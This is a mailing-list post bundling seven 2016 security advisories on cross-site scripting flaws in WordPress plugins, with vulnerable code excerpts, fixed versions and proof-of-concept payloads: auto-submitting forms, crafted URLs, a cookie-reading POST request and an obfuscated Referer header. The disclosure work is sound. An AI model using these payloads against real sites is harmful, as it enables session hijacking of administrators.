Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [day] [month] [year] [list]
Date: Thu, 4 Aug 2016 19:40:14 +0200
From: Summer of Pwnage <lists@...urify.nl>
To: oss-security@...ts.openwall.com
Subject: Multiple Cross-Site Scripting vulnerabilities affecting seven
 WordPress Plugins

Please see attached advisories for more information. These issues were 
found during Summer of Pwnage (https://sumofpwn.nl), a Dutch community 
project. Its goal is to contribute to the security of popular, widely 
used OSS projects in a fun and educational way.



------------------------------------------------------------------------
Cross-Site Scripting in Activity Log WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Activity Log
WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0022

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Activity Log [2] WordPress Plugin
version 2.3.2

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is fixed in Activity Log version 2.3.3 [3]

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Activity Log [2] WordPress Plugin helps monitor & log all changes
and activities on a WordPress site. A Cross-Site Scripting vulnerability
was found in the Activity Log WordPress Plugin. This issue allows an
attacker to perform a wide variety of actions, such as stealing
Administrators' session tokens, or performing arbitrary actions on their
behalf. In order to exploit this issue, the attacker has to lure/force a
logged on WordPress Administrator into opening a malicious website.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The issue exists in the file classes/class-aal-admin-ui.php and is
caused by the lack of output encoding on the page request parameter. The
vulnerable code is listed below.

public function activity_log_page_func() {
	$this->get_list_table()->prepare_items();
	?>
	<div class="wrap">
		<h2 class="aal-page-title"><?php _e( 'Activity Log',
'aryo-activity-log' ); ?></h2>
	
		<form id="activity-filter" method="get">
			<input type="hidden" name="page" value="<?php echo $_REQUEST['page']
?>" />
			<?php $this->get_list_table()->display(); ?>
		</form>
	</div>

Normally, the page URL parameter is validated by WordPress, which
prevents Cross-Site Scripting. However in this case the value of page is
obtained from $_REQUEST, not from $_GET. This allows for parameter
pollution where the attacker puts a benign page value in the URL and
simultaneously submits a malicious page value as POST parameter.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form
action="http://<target>/wp-admin/admin.php?page=activity_log_page"
method="POST">
			<input type="hidden" name="page"
value="&quot;><script>alert(1);</script>" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/cross_site_scripting_in_activity_log_wordpress_plugin.html
[2] https://wordpress.org/plugins/aryo-activity-log/
[3] https://downloads.wordpress.org/plugin/aryo-activity-log.zip
------------------------------------------------------------------------
Cross-Site Scripting in Count per Day WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Count per Day
WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0024

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Count per Day [2] WordPress Plugin
version 3.5.4.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Count per Day version 3.5.5 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Count per Day [2] WordPress Plugin shows reads and visitors per
page, visitors today, yesterday, last week, last months and other
statistics. A Cross-Site Scripting vulnerability was found in the Count
per Day WordPress Plugin. This issue allows an attacker to perform a
wide variety of actions, such as stealing Administrators' session
tokens, or performing arbitrary actions on their behalf.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
This issue exists in the file counter-options.php and is caused due to
the lack of output encoding on the limit POST parameter.

<?php // mass bots ?>
<div class="postbox">
<?php
$limit = (isset($o['massbotlimit'])) ? $o['massbotlimit'] : 25;
$limit = (isset($_POST['limit'])) ? $_POST['limit'] : $limit;
$limit_input = '<input type="text" size="3" name="limit"
value="'.$limit.'" style="text-align:center" />';

In order to exploit this issue, the attacker has to lure/force a logged
on WordPress Administrator into opening a malicious website.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form
action="http://<target>/wp-admin/options-general.php?page=count-per-day%2Fcounter-options.php"
method="POST">
			<input type="hidden" name="limit"
value="&quot;><script>alert(1);</script>" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>[h3]References[/h3]
[1]
https://sumofpwn.nl/advisory/2016/cross_site_scripting_in_count_per_day_wordpress_plugin.html
[2] https://wordpress.org/plugins/count-per-day/
[3] https://downloads.wordpress.org/plugin/count-per-day.3.5.5.zip
------------------------------------------------------------------------
Cross-Site Scripting in FormBuilder WordPress Plugin
------------------------------------------------------------------------
Peter Ganzevles, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Reflected Cross-Site Scripting (XSS) vulnerability has been found in
the FormBuilder WordPress Plugin. By using this vulnerability an
attacker can inject malicious JavaScript code into the application,
which will execute within the browser of any logged-in admin.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160722-0007

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on FormBuilder [2] version 1.05.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in FormBuilder version 1.06 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The FormBuilder [2] Plugin for WordPress allows you to build contact
forms in the WordPress administrative interface without needing to know
PHP or HTML. A Reflected Cross-Site Scripting (XSS) vulnerability has
been found in the FormBuilder WordPress Plugin. By using this
vulnerability an attacker can inject malicious JavaScript code into the
application, which will execute within the browser of any logged-in
admin who views the link in the proof of concept below.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The FormBuilder plugin is vulnerable to a Reflected Cross Site Scripting
attack in the main page. This means that an attacker can craft a link,
such as the one below, which will inject malicious javascript in the
page of any admin visiting it.

The vulnerability lies in a piece of code in the file
html/options_default.inc.php. Here, on line 35-40, the following form
class is created:

35: <form class='formSearch' name="formSearch" method="GET"
action="<?php echo FB_ADMIN_PLUGIN_PATH; ?>">
36: 	<input name='page' type="hidden" value="<?php echo $_GET['page'];
?>" />
37: 	<input name='pageNumber' type="hidden" value="<?php echo
$_GET['pageNumber']; ?>" />
38: 	<input name='formSearch' type="text" size="10" value="<?php echo
$formSearch; ?>" />
39: 	<input class='searchButton' name='Search' type="submit"
value="Search" />
40: </form>

This form has two input fields which are populated with data directly
from a GET parameter, which is not sanitized beforehand. These are
$_GET['page’] and $_GET['pageNumber’]. While supplying a malicious
payload to the $_GET[‘pageNumber’] parameter causes the application
to just throw an error, supplying it to the $_GET[‘page’] parameter
will cause it to be executed.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
The following URL causes an alert box to spawn, which, while not
dangerous in and of itself, is an easy way to prove that it is
vulnerable.

http://<target>/wp-admin/tools.php?page=formbuilder.php&pageNumber=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&formSearch=test&Search=Search
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/cross_site_scripting_in_formbuilder_wordpress_plugin.html
[2] https://wordpress.org/plugins/formbuilder/
[3] https://downloads.wordpress.org/plugin/formbuilder.1.06.zip
------------------------------------------------------------------------
Cross-Site Scripting in WordPress Landing Pages Plugin
------------------------------------------------------------------------
Burak Kelebek, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A reflected Cross-Site Scripting (XSS) vulnerability has been found in
the WordPress Landing Pages Plugin. By using this vulnerability an
attacker can inject malicious JavaScript code into the application,
which will execute within the browser of any user who views the Activity
Log, in general WP admin.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160721-0001

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on WordPress Landing Pages [2]
version 2.2.4.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is fixed in WordPress Landing Pages version 2.2.5 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
WordPress Landing Pages [2] creates landing pages (a.k.a. conversion or
splash pages) for your WordPress site. It gives site owners the ability
to monitor and track conversion rates, run a/b or multivariate split
tests on landing pages, and increase lead flow.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
Cross-Site Scripting (XSS) attacks are a type of injection, in which
malicious scripts are injected into otherwise benign and trusted web
sites. XSS attacks occur when an attacker uses a web application to send
malicious code, generally in the form of a browser side script, to a
different end user. Flaws that allow these attacks to succeed are quite
widespread and occur anywhere a web application uses input from a user
within the output it generates without validating or encoding it.
Reflected XSS occurs when user input is immediately returned by a web
application in an error message, search result, or any other response
that includes some or all of the input provided by the user as part of
the request

"open-tab" field does not validate <script> tags and does not perform
output encoding.

landing-pages/classes/class.settings.php:

177: $active_tab = $_REQUEST['open-tab'];
	
[...]
	
204: echo echo "<form
action='edit.php?post_type=landing-page&page=lp_global_settings'
method='POST'>  	<input type='hidden' name='nature'
value='lp-global-settings-save'>  	<input type='hidden' name='open-tab'
id='id-open-tab' value='{$active_tab}'>";

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
http://<target>/wp-admin/edit.php?post_type=landing-page&page=lp_global_settings&open-tab=foobar%5C%27%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/cross_site_scripting_in_wordpress_landing_pages_plugin.html
[2] https://wordpress.org/plugins/landing-pages/
[3] https://downloads.wordpress.org/plugin/landing-pages.2.2.5.zip
------------------------------------------------------------------------
Cross-Site Scripting vulnerability in Events Made Easy WordPress plugin
------------------------------------------------------------------------
Job Diesveld, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability has been found in the Events Made
Easy WordPress plugin. By using this issue an attacker can create a
specially crafted event which, when posted to WordPress, injects
malicious JavaScript code into the application. This code will execute
within the browser of any user who views the relevant application
content. 

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160729-0001

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue has been fixed in Events Made Easy [2] plugin version 1.6.21.

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Events Made Easy [3] plugin
version 1.6.20.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The WordPress Events Made Easy [3] plugin is a full-featured event
management solution for WordPress. It supports public, private, draft
and recurring events, locations management, RSVP (+ optional approval),
Paypal, 2Checkout, FirstData and Google maps.

Upon adding a new Events Made Easy event within the WordPress admin
interface, the plugin allows script code to be added to among others the
Single Event Format textbox. The plugin insufficiently checks the nonces
closedpostboxesnonce and meta-box-order-nonce when the event is posted
to the server, nor is any other nonce employed to prevent CSRF from
occurring. If an attacker can lure a WordPress admin into posting an
event with malicious script code, this code is subsequently stored in
the application and can be used to perform a wide variety of actions,
such as stealing victims' session tokens or login credentials,
performing arbitrary actions on their behalf, and logging their
keystrokes.

https://sumofpwn.nl/advisory/2016/poc-1.png

------------------------------------------------------------------------
Proof of Concept
------------------------------------------------------------------------
The following request can be used to create an event containing
JavaScript that will obtain the cookie of the current user:


POST
/wp-admin/admin.php?page=events-manager&eme_admin_action=update_event&event_id=16
HTTP/1.1
Host: <target>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0)
Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: <session cookies>
Connection: close
Content-Type: multipart/form-data;
boundary=---------------------------224523339434990794855940370
Content-Length: 8579
	
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_status"
	
5
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_contactperson_id"
	
-1
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_seats"
	
0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="price"
	
0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="currency"
	
EUR
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_max_allowed"
	
10
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_min_allowed"
	
1
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_rsvp_discount"
	
	
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_rsvp_discountgroup"
	
	
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="rsvp_number_days"
	
0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="rsvp_number_hours"
	
0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_rsvp_end_target"
	
start
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_name"
	
fooname
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_slug"
	
fooname
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="localised_recurrence_date"
	
07/29/2016
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="recurrence_start_date"
	
2016-07-29
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="localised_recurrence_end_date"
	
07/29/2016
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="recurrence_end_date"
	
2016-07-29
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="recurrence_freq"
	
daily
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="recurrence_interval"
	
	
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="recurrence_byweekno"
	
1
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="recurrence_byday"
	
1
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="localised_event_start_date"
	
07/29/2016
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_start_date"
	
2016-07-29
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="localised_event_end_date"
	
07/29/2016
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_end_date"
	
2016-07-29
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_start_time"
	
01:22PM
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_end_time"
	
01:22PM
-----------------------------224523339434990794855940370
Content-Disposition: form-data;
name="eme_prop_event_page_title_format_tpl"
	
0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_page_title_format"
	
lalalala
-----------------------------224523339434990794855940370
Content-Disposition: form-data;
name="eme_prop_event_single_event_format_tpl"
	
0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_single_event_format"
	
<p>#_STARTDATE -
#_STARTTIME</p><p>#_TOWN</p><p>#_NOTES</p><p>#_ADDBOOKINGFORM</p><p>#_MAP</p><script>alert(document.cookies)</script>
-----------------------------224523339434990794855940370
Content-Disposition: form-data;
name="eme_prop_event_contactperson_email_body_tpl"
	
0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_contactperson_email_body"
	
	
-----------------------------224523339434990794855940370
Content-Disposition: form-data;
name="eme_prop_event_registration_recorded_ok_html_tpl"
	
0
-----------------------------224523339434990794855940370
Content-Disposition: form-data;
name="event_registration_recorded_ok_html"
	
	
-----------------------------224523339434990794855940370
Content-Disposition: form-data;
name="eme_prop_event_respondent_email_body_tpl"
	
0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_respondent_email_body"
	
	
-----------------------------224523339434990794855940370
Content-Disposition: form-data;
name="eme_prop_event_registration_pending_email_body_tpl"
	
0
-----------------------------224523339434990794855940370
Content-Disposition: form-data;
name="event_registration_pending_email_body"
	
	
-----------------------------224523339434990794855940370
Content-Disposition: form-data;
name="eme_prop_event_registration_updated_email_body_tpl"
	
0
-----------------------------224523339434990794855940370
Content-Disposition: form-data;
name="event_registration_updated_email_body"
	
	
-----------------------------224523339434990794855940370
Content-Disposition: form-data;
name="eme_prop_event_registration_cancelled_email_body_tpl"
	
0
-----------------------------224523339434990794855940370
Content-Disposition: form-data;
name="event_registration_cancelled_email_body"
	
Dear #_RESPNAME,
	
Your request to reserve #_RESPSPACES space(s) for #_EVENTNAME has been
cancelled.
	
Yours faithfully,awfe
#_CONTACTPERSON
-----------------------------224523339434990794855940370
Content-Disposition: form-data;
name="eme_prop_event_registration_denied_email_body_tpl"
	
0
-----------------------------224523339434990794855940370
Content-Disposition: form-data;
name="event_registration_denied_email_body"
	
Dear #_RESPNAME,
	
Your request to reserve #_RESPSPACES space(s) for #_EVENTNAME has been
denied.
	
Yours faithfully,
#_CONTACTPERSONawef
-----------------------------224523339434990794855940370
Content-Disposition: form-data;
name="eme_prop_event_registration_form_format_tpl"
	
0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_registration_form_format"
	
	
-----------------------------224523339434990794855940370
Content-Disposition: form-data;
name="eme_prop_event_cancel_form_format_tpl"
	
0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_cancel_form_format"
	
	
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="location_name"
	
piet
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="location_address"
	
kaas
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="location_town"
	
foo
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="location_latitude"
	
57.198
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="location_longitude"
	
9.67063
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="content"
	
gold
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_image_url"
	
	
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_image_id"
	
	
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_url"
	
	
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_update_button"
	
Update »
-----------------------------224523339434990794855940370
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_events_made_easy_wordpress_plugin.html
[2] https://downloads.wordpress.org/plugin/events-made-easy.1.6.21.zip
[3] https://wordpress.org/plugins/events-made-easy/
------------------------------------------------------------------------
Cross-Site Scripting vulnerability in search function Activity Log
WordPress Plugin
------------------------------------------------------------------------
Edwin Molenaar [2], July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Activity Log
WordPress Plugin.  This issue allows an attacker to perform a wide
variety of actions, such as stealing users' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a victim into opening a malicious
website/link.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160718-0002

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Activity Log [3] WordPress Plugin
version 2.3.2.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is fixed in Activity Log version 2.3.3 [4]

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Activity Log [3] WordPress Plugin helps monitor & log all changes
and activities on a WordPress site. A reflected Cross-Site Scripting
vulnerability exists in the Activity Log WordPress plugin. This
vulnerability allows an attacker to perform any action with the
privileges of the target user.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The vulnerability exists in improper filtering of the search input
parameter $search_data in the file
aryo-activity-log/classes/class-aal-activity-log-list-table.php at line
483. The WordPress sanitize_text_field [5] sanitizer is used, but this
still allows us to use spaces, " and () to craft a Cross-Site Scripting
payload.

public function search_box( $text, $input_id ) {
	
	$search_data = isset( $_REQUEST['s'] ) ? sanitize_text_field(
$_REQUEST['s'] ) : '';
	
	$input_id = $input_id . '-search-input';
	?>
	<p class="search-box">
		<label class="screen-reader-text" for="<?php echo $input_id ?>"><?php
echo $text; ?>:</label>
		<input type="search" id="<?php echo $input_id ?>" name="s"
value="<?php echo $search_data; ?>" />
		<?php submit_button( $text, 'button', false, false, array('id' =>
'search-submit') ); ?>
	</p>

When a search on the activity log is preformed, a CSRF token is added to
the URL, however it is not checked. Consequently, it can be exploited by
luring the target user into clicking a specially crafted link or
visiting a malicious website (or advertisement).

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
http://<target>/wp-admin/admin.php?page=activity_log_page&s=111"+onfocus=alert(document.domain)+"+autofocus="&paged=1
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_search_function_activity_log_wordpress_plugin.html
[2] https://www.linkedin.com/in/edwinmolenaar
[3] https://wordpress.org/plugins/aryo-activity-log/
[4] https://downloads.wordpress.org/plugin/aryo-activity-log.zip
[5]
https://developer.wordpress.org/reference/functions/sanitize_text_field/
------------------------------------------------------------------------
Stored Cross-Site Scripting vulnerability in Count per Day WordPress
Plugin
------------------------------------------------------------------------
Julien Rentrop, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Count per Day
WordPress Plugin. This issue can be exploited by an unauthenticated
attacker and allows an attacker to perform a wide variety of actions,
such as stealing users' session tokens, or performing arbitrary actions
on their behalf. In order to exploit this issue, the attacker has to
lure/force a victim into opening a malicious website/link.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160717-0001

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Count per Day [2] WordPress Plugin
version 3.5.4.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Count per Day version 3.5.5 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Count per Day [2] WordPress Plugin shows reads and visitors per
page, visitors today, yesterday, last week, last months and other
statistics. A Cross-Site Scripting vulnerability was found in the Count
per Day WordPress Plugin. This issue can be exploited by an
unauthenticated attacker and allows an attacker to perform a wide
variety of actions, such as stealing users' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a victim into opening a malicious
website/link.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
When manipulating the referer header by putting in javascript: it will
be rendered on the admin page within the referers list as a a href
attribute. When admin (or above author level) clicks on it the XSS gets
executed.
 
Tags get stripped so it's not possible to execute the XSS directly on
load. Single and double quotes are escaped, but can be worked around.
Example:

Referer:
javascript:c=String.fromCharCode;alert(c(83)+c(117)+c(109)+c(79)+c(102)+c(80)+c(119)+c(110)+c(46)+c(110)+c(108))
 
The referer list shows the top 20. But its easy to get your attack
referer in the top by just looping with unique x-forwarded-for ip's. By
default referers are stored (but can be turned off in the settings of
the plugin). Up to 150 chars of the referer are stored (can be changed
to 500 max).

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
GET / HTTP/1.1
Host: <target>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103
Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8,nl;q=0.6
x-forwarded-for: 1.1.1.5
Referer:
javascript:c=String.fromCharCode;alert(c(83)+c(117)+c(109)+c(79)+c(102)+c(80)+c(119)+c(110)+c(46)+c(110)+c(108))
Connection: close
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/stored_cross_site_scripting_vulnerability_in_count_per_day_wordpress_plugin.html
[2] https://wordpress.org/plugins/count-per-day/
[3] https://downloads.wordpress.org/plugin/count-per-day.3.5.5.zip

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ